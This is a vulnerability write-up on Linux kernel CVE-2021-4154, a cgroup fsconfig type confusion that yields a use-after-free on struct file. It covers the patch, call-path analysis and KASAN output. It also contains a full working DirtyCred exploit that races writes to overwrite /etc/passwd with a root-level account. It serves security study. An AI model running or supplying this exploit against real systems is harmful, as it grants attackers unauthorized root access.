CVE-2021-4154: Vulnerability Analysis and Exploitation

CVE-2021-4154 is the first vulnerability used in the DirtyCred exploitation examples. The related slides, paper, and source code are listed below:

BlackHat USA 2022 - Cautious! A New Exploitation Method! No Pipe but as Nasty as Dirty Pipe

Paper - DirtyCred: Escalating Privilege in Linux Kernel

GitHub - Markakd/DirtyCred

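Besides the DirtyCred method, this vulnerability can also be exploited with the conventional cross-cache technique, although that process is more complex.

Vulnerability analysis

Fix commit: cgroup: verify that source is a string

The patch that fixes the vulnerability is shown below: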

diff --git a/kernel/cgroup/cgroup-v1.c b/kernel/cgroup/cgroup-v1.c
index ee93b6e895874..527917c0b30be 100644
--- a/kernel/cgroup/cgroup-v1.c
+++ b/kernel/cgroup/cgroup-v1.c
@@ -912,6 +912,8 @@ int cgroup1_parse_param(struct fs_context *fc, struct fs_parameter *param)
     opt = fs_parse(fc, cgroup1_fs_parameters, param, &result);
     if (opt == -ENOPARAM) {
         if (strcmp(param->key, "source") == 0) {
+            if (param->type != fs_value_is_string)
+                return invalf(fc, "Non-string source");
             if (fc->source)
                 return invalf(fc, "Multiple sources not supported");
             fc->source = param->string;

The core of the PoC is the following snippet:

int fscontext_fd = fsopen("cgroup", 0);
int fd_null = open("/dev/null", O_RDONLY);
fsconfig(fscontext_fd, FSCONFIG_SET_FD, "source", NULL, fd_null);
close_range(3, ~0U, 0); // closing fscontext_fd frees the struct file behind fd_null, which produces the UAF

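The bug is in the handling of the fsconfig system call: the kernel treats the struct file behind the file descriptor fd_null as a pointer to a heap buffer holding a string. In other words, it confuses fs_parameter->file with fs_parameter->string in the structure below: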

/*
 * Configuration parameter.
 */
struct fs_parameter {
    const char *key; /* Parameter name */
    enum fs_value_type type:8; /* The type of value here */
    union {
        char *string;
        void *blob;
        struct filename *name;
        struct file *file;
    };
    size_t size;
    int dirfd;
};

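As a result, a struct file pointer is assigned to fc->source. When close(fscontext_fd) is called, fc->source (that is, the struct file behind fd_null) is freed while fd_null is still in use, which results in a UAF.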

Let's trace how the UAF comes about:

  1. First, the assignment to fc->source. Following the fsconfig call path:

    SYSCALL_DEFINE5(fsconfig, int, fd, unsigned int, cmd, const char __user *, _key, const void __user *, _value, int, aux)
    /*
    if (_key) {
    param.key = strndup_user(_key, 256);
    }
    ......
    case FSCONFIG_SET_FD:
    param.type = fs_value_is_file;
    ret = -EBADF;
    param.file = fget(aux); // fget(): looks up the struct file for a file descriptor and increments file->f_count
    // fput(): the counterpart of fget(); decrements f_count and releases the struct file once f_count reaches 0
    if (!param.file)
    goto out_key;
    break;
    */

    vfs_fsconfig_locked(fc, cmd, &param);

    vfs_parse_fs_param(fc, param);

    fc->ops->parse_param(fc, param);

    cgroup1_parse_param(struct fs_context *fc, struct fs_parameter *param)
    /*
    if (strcmp(param->key, "source") == 0) {
    fc->source = param->string; // union: param->string aliases param->file
    param->string = NULL;
    return 0;
    }
    */
  2. Next, the free site. After user space calls close(fscontext_fd), the kernel takes the following path:

    fscontext_release()

    put_fs_context()
    /*
    put_filesystem(fc->fs_type);
    kfree(fc->source); // this free leaves the struct file behind fd_null dangling (UAF)
    kfree(fc);
    */

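From the perspective of the code logic:

The cgroup v1 fs parser assumes that the value supplied for the key "source" is a string. In the actual implementation, however, a caller can set the key to "source", pass a file descriptor in aux (FSCONFIG_SET_FD), and still reach the "source" branch of cgroup1_parse_param(). The vulnerability therefore comes from assuming that the type for "source" is always fs_value_is_string, when it can also be fs_value_is_file.

From the perspective of the fs_parameter structure:

When the union in fs_parameter is used, param->type should determine which member of the union is valid. The parameter parsing in cgroup1_parse_param() never checks param->type, though; it simply reads the value as param->string and assigns it to fc->source, so a struct file pointer ends up in fc->source.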

PoC

The PoC uses two system calls, fsopen() and fsconfig(), so let's look at them first:

/*
sys_fsopen - Open a filesystem by name so that it can be configured for mounting.
*/
asmlinkage long sys_fsopen(const char __user *fs_name, unsigned int flags);

/*
sys_fsconfig - Set parameters and trigger actions on a context
@cmd - fsconfig_set_fd: An open file descriptor is specified. @_value must be NULL and @aux indicates the file descriptor.
*/
asmlinkage long sys_fsconfig(int fs_fd, unsigned int cmd, const char __user *key,
const void __user *value, int aux);

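The full PoC follows. After compiling and running it, the UAF report shows up in dmesg (provided the kernel was built with KASAN; otherwise the bug is not caught).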

// gcc test.c -o test
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <stdarg.h>
#include <unistd.h>
#include <fcntl.h>
#include <string.h>
#include <ctype.h>
#include <pthread.h>
#include <sys/mman.h>
#include <sys/syscall.h>

static void die(const char *fmt, ...) {
    va_list params;
    va_start(params, fmt);
    vfprintf(stderr, fmt, params);
    va_end(params);
    exit(1);
}

void init_namespace(void) {
    int fd;
    char buff[0x100];

    uid_t uid = getuid();
    gid_t gid = getgid();

    if (unshare(CLONE_NEWUSER | CLONE_NEWNS)) {
        die("unshare(CLONE_NEWUSER | CLONE_NEWNS): %m");
    }

    if (unshare(CLONE_NEWNET)) {
        die("unshare(CLONE_NEWNET): %m");
    }

    fd = open("/proc/self/setgroups", O_WRONLY);
    snprintf(buff, sizeof(buff), "deny");
    write(fd, buff, strlen(buff));
    close(fd);

    fd = open("/proc/self/uid_map", O_WRONLY);
    snprintf(buff, sizeof(buff), "0 %d 1", uid);
    write(fd, buff, strlen(buff));
    close(fd);

    fd = open("/proc/self/gid_map", O_WRONLY);
    snprintf(buff, sizeof(buff), "0 %d 1", gid);
    write(fd, buff, strlen(buff));
    close(fd);
}


int main(){
    init_namespace();
    int fd_fscontext = syscall(__NR_fsopen, "cgroup", 0);
    if (fd_fscontext < 0) {
        perror("fsopen");
        die("");
    }
    int fd_null = open("/dev/null", O_RDONLY);
    syscall(__NR_fsconfig, fd_fscontext, 5, "source", 0, fd_null); // 5 == FSCONFIG_SET_FD
    close(fd_fscontext);
    close(fd_null);
    //close_range(3, ~0U, 0);
}

dmesg prints the following:

[ 1785.655850] ==================================================================
[ 1785.658925] BUG: KASAN: use-after-free in filp_close+0x26/0xb0
[ 1785.661875] Read of size 8 at addr ffff8883cd692c78 by task test/2163

[ 1785.667787] CPU: 6 PID: 2163 Comm: test Tainted: G L 5.4.0 #2
[ 1785.667790] Hardware name: VMware, Inc. VMware Virtual Platform/440BX Desktop Reference Platform, BIOS 6.00 11/12/2020
[ 1785.667793] Call Trace:
[ 1785.667808] dump_stack+0x96/0xca
[ 1785.667818] print_address_description.constprop.0+0x20/0x210
[ 1785.667824] ? filp_close+0x26/0xb0
[ 1785.667828] __kasan_report.cold+0x1b/0x41
[ 1785.667832] ? filp_close+0x26/0xb0
[ 1785.667836] kasan_report+0x12/0x20
[ 1785.667841] check_memory_region+0x129/0x1b0
[ 1785.667845] __kasan_check_read+0x11/0x20
[ 1785.667848] filp_close+0x26/0xb0
[ 1785.667854] __close_fd+0x11d/0x150
[ 1785.667858] __x64_sys_close+0x40/0x80
[ 1785.667865] do_syscall_64+0x72/0x210
[ 1785.667870] entry_SYSCALL_64_after_hwframe+0x44/0xa9
[ 1785.667876] RIP: 0033:0x7fe01ac4a817
[ 1785.667883] Code: ff ff e8 7c 12 02 00 66 2e 0f 1f 84 00 00 00 00 00 66 90 f3 0f 1e fa 64 8b 04 25 18 00 00 00 85 c0 75 10 b8 03 00 00 00 0f 05 <48> 3d 00 f0 ff ff 77 41 c3 48 83 ec 18 89 7c 24 0c e8 b3 5d f8 ff
[ 1785.667885] RSP: 002b:00007ffeba9710a8 EFLAGS: 00000246 ORIG_RAX: 0000000000000003
[ 1785.667891] RAX: ffffffffffffffda RBX: 000055e759df2640 RCX: 00007fe01ac4a817
[ 1785.667893] RDX: 000055e759df311a RSI: 0000000000000005 RDI: 0000000000000004
[ 1785.667895] RBP: 00007ffeba9710c0 R08: 0000000000000004 R09: 00007ffeba9711b0
[ 1785.667897] R10: 0000000000000000 R11: 0000000000000246 R12: 000055e759df21e0
[ 1785.667900] R13: 00007ffeba9711b0 R14: 0000000000000000 R15: 0000000000000000

[ 1785.670155] Allocated by task 2163:
[ 1785.672385] save_stack+0x23/0x90
[ 1785.672389] __kasan_kmalloc.constprop.0+0xcf/0xe0
[ 1785.672393] kasan_slab_alloc+0xe/0x10
[ 1785.672396] kmem_cache_alloc+0xce/0x240
[ 1785.672400] __alloc_file+0x2b/0x1c0
[ 1785.672402] alloc_empty_file+0x46/0xc0
[ 1785.672407] path_openat+0xd1/0x22f0
[ 1785.672410] do_filp_open+0x12b/0x1c0
[ 1785.672413] do_sys_open+0x1fb/0x2f0
[ 1785.672417] __x64_sys_openat+0x59/0x70
[ 1785.672421] do_syscall_64+0x72/0x210
[ 1785.672425] entry_SYSCALL_64_after_hwframe+0x44/0xa9

[ 1785.674579] Freed by task 2163:
[ 1785.676657] save_stack+0x23/0x90
[ 1785.676661] __kasan_slab_free+0x137/0x180
[ 1785.676664] kasan_slab_free+0xe/0x10
[ 1785.676667] kfree+0x98/0x260
[ 1785.676671] put_fs_context+0x16f/0x210
[ 1785.676674] fscontext_release+0x35/0x40
[ 1785.676678] __fput+0x16e/0x3a0
[ 1785.676680] ____fput+0xe/0x10
[ 1785.676686] task_work_run+0xc0/0xe0
[ 1785.676690] exit_to_usermode_loop+0x187/0x1c0
[ 1785.676693] do_syscall_64+0x1e0/0x210
[ 1785.676697] entry_SYSCALL_64_after_hwframe+0x44/0xa9

[ 1785.678642] The buggy address belongs to the object at ffff8883cd692c40
which belongs to the cache filp(1119:session-1.scope) of size 256
[ 1785.683211] The buggy address is located 56 bytes inside of
256-byte region [ffff8883cd692c40, ffff8883cd692d40)
[ 1785.687552] The buggy address belongs to the page:
[ 1785.689679] page:ffffea000f35a400 refcount:1 mapcount:0 mapping:ffff8883cfa661c0 index:0xffff8883cd6952c0 compound_mapcount: 0
[ 1785.689687] raw: 0017ffffc0010200 ffffea000cd81008 ffff8883d45ace50 ffff8883cfa661c0
[ 1785.689692] raw: ffff8883cd6952c0 00000000002e001f 00000001ffffffff 0000000000000000
[ 1785.689694] page dumped because: kasan: bad access detected

[ 1785.691712] Memory state around the buggy address:
[ 1785.693790] ffff8883cd692b00: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc
[ 1785.695944] ffff8883cd692b80: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc
[ 1785.698214] >ffff8883cd692c00: fc fc fc fc fc fc fc fc fb fb fb fb fb fb fb fb
[ 1785.699548] ^
[ 1785.701820] ffff8883cd692c80: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
[ 1785.703994] ffff8883cd692d00: fb fb fb fb fb fb fb fb fc fc fc fc fc fc fc fc
[ 1785.706162] ==================================================================
[ 1785.708370] Disabling lock debugging due to kernel taint

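Exploitation - DirtyCred

The exploitation logic can be described with a few figures:

  1. First, how the UAF arises

    image-20230518220859656

  2. Then, the exploitation idea under ideal conditions

    Following the DirtyCred approach, in the window between the permission check on the file and the actual write, the freed struct file is replaced with that of a privileged file that we are not allowed to write.

    image-20230518222645219

    However, the window between "check" and "write" is far too small to exploit reliably.

  3. Finally, the exploitation idea that widens the TOCTOU window

    image-20230518225350906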

I made a few changes on top of the original author's exploit to produce a simpler, more readable version. The main differences are:

  • It uses a helper function that wraps namespace creation
  • It uses the more common write() instead of writev()
  • It shrinks the written data to 1 GB, which shortens the exploit's run time while still leaving a window that is more than long enough

#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <stdarg.h>
#include <unistd.h>
#include <fcntl.h>
#include <string.h>
#include <ctype.h>
#include <pthread.h>
#include <assert.h>
#include <sys/mman.h>
#include <sys/syscall.h>
#include <sys/uio.h>
#include <sys/stat.h>
#include <linux/kcmp.h>

#ifndef __NR_fsconfig
#define __NR_fsconfig 431
#endif
#ifndef __NR_fsopen
#define __NR_fsopen 430
#endif

#define NR_PAGE 0x40000
#define MAX_FILE_NUM 1000
int uaf_fd;
int fds[MAX_FILE_NUM];

volatile int run_write = 0; // volatile: these flags are polled in busy-wait loops by other threads
volatile int run_spray = 0;


static void die(const char *fmt, ...) {
    va_list params;

    va_start(params, fmt);
    vfprintf(stderr, fmt, params);
    va_end(params);
    exit(1);
}


void init_namespace(void) {
    int fd;
    char buff[0x100];

    uid_t uid = getuid();
    gid_t gid = getgid();

    if (unshare(CLONE_NEWUSER | CLONE_NEWNS)) {
        die("unshare(CLONE_NEWUSER | CLONE_NEWNS): %m \n");
    }

    if (unshare(CLONE_NEWNET)) {
        die("unshare(CLONE_NEWNET): %m \n");
    }

    fd = open("/proc/self/setgroups", O_WRONLY);
    snprintf(buff, sizeof(buff), "deny");
    write(fd, buff, strlen(buff));
    close(fd);

    fd = open("/proc/self/uid_map", O_WRONLY);
    snprintf(buff, sizeof(buff), "0 %d 1", uid);
    write(fd, buff, strlen(buff));
    close(fd);

    fd = open("/proc/self/gid_map", O_WRONLY);
    snprintf(buff, sizeof(buff), "0 %d 1", gid);
    write(fd, buff, strlen(buff));
    close(fd);
}

static void use_temporary_dir(void) {
    system("rm -rf exp_dir; mkdir exp_dir; touch exp_dir/data");
    char *tmpdir = "exp_dir";
    if (!tmpdir)
        exit(1);
    if (chmod(tmpdir, 0777))
        exit(1);
    if (chdir(tmpdir))
        exit(1);
}

void trigger() {
    int fs_fd = syscall(__NR_fsopen, "cgroup", 0);
    if (fs_fd < 0) {
        perror("fsopen");
        die("");
    }

    symlink("./data", "./uaf"); // create a symlink to the data file so that the opened file's f_mode does not get the FMODE_ATOMIC_POS flag

    uaf_fd = open("./uaf", 1);
    if (uaf_fd < 0) {
        die("failed to open symbolic file\n");
    }

    if (syscall(__NR_fsconfig, fs_fd, 5, "source", 0, uaf_fd)) { // 5 == FSCONFIG_SET_FD
        perror("fsconfig");
        exit(-1);
    }

    close(fs_fd); // frees the struct file object behind uaf_fd
}

void *slow_write() {
    printf("[*] start slow write to get the lock\n");
    int fd = open("./uaf", 1);

    if (fd < 0) {
        perror("error open uaf file");
        exit(-1);
    }

    unsigned long int addr = 0x30000000;
    int offset;
    // use mmap to build a large region of "\x00" data
    for (offset = 0; offset < NR_PAGE; offset++) {
        void *r = mmap((void *)(addr + offset * 0x1000), 0x1000, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
        if (r == MAP_FAILED) {
            printf("allocate failed at 0x%x\n", offset);
        }
    }
    assert(offset > 0);

    uint64_t wr_len = (NR_PAGE-1)*0x1000;
    run_write = 1;
    if (write(fd, (void *)addr, wr_len) < 0) { // write roughly 1 GB to the on-disk file to widen the TOCTOU window
        perror("slow write");
    }

    printf("[*] write done!\n");
    close(fd);
    return NULL;
}

void *write_cmd() {
    char data[1024] = "bling:x:0:0:root:/home/bling:/bin/bash\nroot:x:0:0:root:/root:/bin/bash\n";

    while (!run_write) {}

    run_spray = 1;
    if(write(uaf_fd, data, strlen(data)) < 0){ // slow_write() is still writing the file, so this call blocks after the write check and leaves a window for spray_files()
        printf("failed to write\n");
    }

    printf("[*] overwrite done! It should be after the slow write\n");
    return NULL;
}

void spray_files() {
    int found = 0;

    while (!run_spray) {}

    printf("[*] got uaf fd %d, start spray....\n", uaf_fd);
    for (int i = 0; i < MAX_FILE_NUM; i++) {
        fds[i] = open("/etc/passwd", O_RDONLY); // reclaim the freed file object with the struct file of "/etc/passwd"
        if (fds[i] < 0) {
            perror("open file");
            printf("%d\n", i);
        }
        // check whether uaf_fd and fds[i] refer to the same open file description (struct file); kcmp returns 0 if they do
        if (syscall(__NR_kcmp, getpid(), getpid(), KCMP_FILE, uaf_fd, fds[i]) == 0) {
            found = 1;
            printf("[!] found, file id %d\n", i);
            for (int j = 0; j < i; j++)
                close(fds[j]);
            break;
        }
    }

    if(found == 0){
        printf("spray failed, try again!\n");
    }
}

int main(){
    pthread_t p_id, p_id_cmd;

    use_temporary_dir(); // create a directory for the files the exploit needs
    init_namespace(); // create new namespaces
    trigger(); // trigger the "free" half of the UAF

    pthread_create(&p_id, NULL, slow_write, NULL); // widen the time window
    usleep(1);
    pthread_create(&p_id_cmd, NULL, write_cmd, NULL); // the "use" half of the UAF: write through the fd whose struct file was freed

    spray_files(); // heap spray: reclaim the freed file object with a privileged struct file

    pthread_exit(NULL);
    return 0;

}

In a virtual machine running Ubuntu Server 20.04, the exploit successfully overwrites /etc/passwd and escalates privileges:

image-20230518203532228

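Exploitation - cross-cache

TODO…

This approach reminds me of the kcache challenge from D3CTF that I failed to solve a while ago: cross-cache + msgmsg + pipe buffer. I'll set it aside for now and come back to it later.

Q&A

Where are the "check" and the "write" in write(v)?

The "check" point is where the permission of the file itself is verified, namely whether file->f_mode has the write flag. The "write" point is where the write is actually carried out.

For the former, write and writev perform the check in different functions; for the latter, both end up in the write function of the underlying filesystem.

Kernel entry functions for the read/write/readv/writev system calls: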

writev -> do_writev
readv -> do_readv
write -> ksys_write
read -> ksys_read
open -> do_sys_open

Taking Linux 5.4.0 as an example, let's trace the "check" and "write" points while the writev and write system calls are processed.

Location of the "check":

/*
When user space calls writev(), the kernel follows the path below; the permission check ("check") is performed in do_iter_write():
writev -> do_writev -> vfs_writev -> do_iter_write -> do_iter_readv_writev -> call_write_iter -> file->f_op->write_iter
*/
static ssize_t do_iter_write(struct file *file, struct iov_iter *iter,
        loff_t *pos, rwf_t flags)
{
    // ......
    if (!(file->f_mode & FMODE_WRITE)) // check
        return -EBADF;
    if (!(file->f_mode & FMODE_CAN_WRITE)) // check
        return -EINVAL;

    if (file->f_op->write_iter)
        ret = do_iter_readv_writev(file, iter, pos, WRITE, flags);
    // ......
    return ret;
}


/*
When user space calls write(), the kernel follows the path below; the permission check ("check") is performed in vfs_write():
write -> ksys_write -> vfs_write -> new_sync_write -> call_write_iter -> file->f_op->write_iter
*/
ssize_t vfs_write(struct file *file, const char __user *buf, size_t count, loff_t *pos)
{
    // ......
    if (!(file->f_mode & FMODE_WRITE)) // check
        return -EBADF;
    if (!(file->f_mode & FMODE_CAN_WRITE)) // check
        return -EINVAL;
    // ......
    else if (file->f_op->write_iter)
        ret = new_sync_write(file, buf, count, pos);
    // ......
    return ret;
}

Location of the "write":

/*
For on-disk files, file->f_op is set to ext4_file_operations:
.rodata:FFFFFFFF82082840 public ext4_file_operations
.rodata:FFFFFFFF82082840 ext4_file_operations dq 0 ; DATA XREF: __ext4_iget+B32↑o
.rodata:FFFFFFFF82082840 ; ext4_create+E1↑o ...
.rodata:FFFFFFFF82082848 dq offset ext4_llseek
.rodata:FFFFFFFF82082850 dq 0
.rodata:FFFFFFFF82082858 dq 0
.rodata:FFFFFFFF82082860 dq offset ext4_file_read_iter
.rodata:FFFFFFFF82082868 dq offset ext4_file_write_iter

file->f_op->write_iter -> ext4_file_write_iter -> ext4_buffered_write_iter
*/
static ssize_t ext4_buffered_write_iter(struct kiocb *iocb,
        struct iov_iter *from)
{
    // ......
    inode_lock(inode); // the filesystem does not let multiple threads write to the same file at once; this lock guarantees a single writer at any moment
    // ......
    ret = generic_perform_write(iocb->ki_filp, from, iocb->ki_pos); // write
    // ......
out:
    inode_unlock(inode);
    // ......
    return ret;
}

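So in the exploit, one thread delays the call to inode_unlock(inode) by writing a large file, and the other thread stalls at inode_lock(inode) while waiting for the lock. This produces the sequence "check" -> pause -> "write". With the two threads working together, the size of the large file determines the length of the TOCTOU window.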

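Why writev rather than write?

write works as well.

Jann Horn's double-put exploit needs writev because it makes the kernel thread pause while the kernel reads the iovec structures.

In this exploit, the kernel thread pauses inside ext4_file_write_iter(), which is the same for writev and write; both reach that code path.

Since it makes no difference whether writev or write is used, my exploit uses the more familiar write().

Why create a symlink to write through?

To get around the lock in __fdget_pos().

Both write() and writev() call fdget_pos() when writing a file. Depending on the file mode (file->f_mode), this function decides whether to take the lock file->f_pos_lock. When file->f_mode contains FMODE_ATOMIC_POS and the file is shared (file_count(file) > 1), it takes file->f_pos_lock to keep other threads out.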

static inline struct fd fdget_pos(int fd)
{
    return __to_fd(__fdget_pos(fd));
}

unsigned long __fdget_pos(unsigned int fd)
{
    unsigned long v = __fdget(fd);
    struct file *file = (struct file *)(v & ~3);

    if (file && (file->f_mode & FMODE_ATOMIC_POS)) {
        if (file_count(file) > 1) {
            v |= FDPUT_POS_UNLOCK;
            mutex_lock(&file->f_pos_lock);
        }
    }
    return v;
}

/* File needs atomic accesses to f_pos */
#define FMODE_ATOMIC_POS ((__force fmode_t)0x8000)

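At this point, however, the write permission check has not happened yet. The exploit needs a lock that is taken after the permission check; the lock in fdget_pos() would prevent us from widening the TOCTOU window, so we have to find a way around it.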

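Where does FMODE_ATOMIC_POS come from? When we open() a file, the kernel goes through the function below. If the file's inode is a regular file or a directory, FMODE_ATOMIC_POS is added to the file's f_mode.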

static int do_dentry_open(struct file *f,
        struct inode *inode,
        int (*open)(struct inode *, struct file *))
{
    // ......
    /* POSIX.1-2008/SUSv4 Section XSI 2.9.7 */
    if (S_ISREG(inode->i_mode) || S_ISDIR(inode->i_mode))
        f->f_mode |= FMODE_ATOMIC_POS;
    // ......
}

S_ISLNK(st_mode) // is it a symbolic link
S_ISREG(st_mode) // is it a regular file
S_ISDIR(st_mode) // is it a directory
S_ISCHR(st_mode) // is it a character device
S_ISBLK(st_mode) // is it a block device
S_ISFIFO(st_mode) // is it a FIFO
S_ISSOCK(st_mode) // is it a socket

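So we only need to create a symlink to the file to be written and open it through the symlink; this keeps FMODE_ATOMIC_POS from being added to f_mode and thereby avoids taking the lock in fdget_pos().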

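References

CVE-2021-4154: Erroneously Freeing an Arbitrary file Object - DirtyCred Exploitation

Linux File Systems: mount

The New-Generation mount System Calls (1): A First Look at the Interface

[C] Common Macros Such as S_ISDIR and S_ISREG

kcmp(2) — Linux manual page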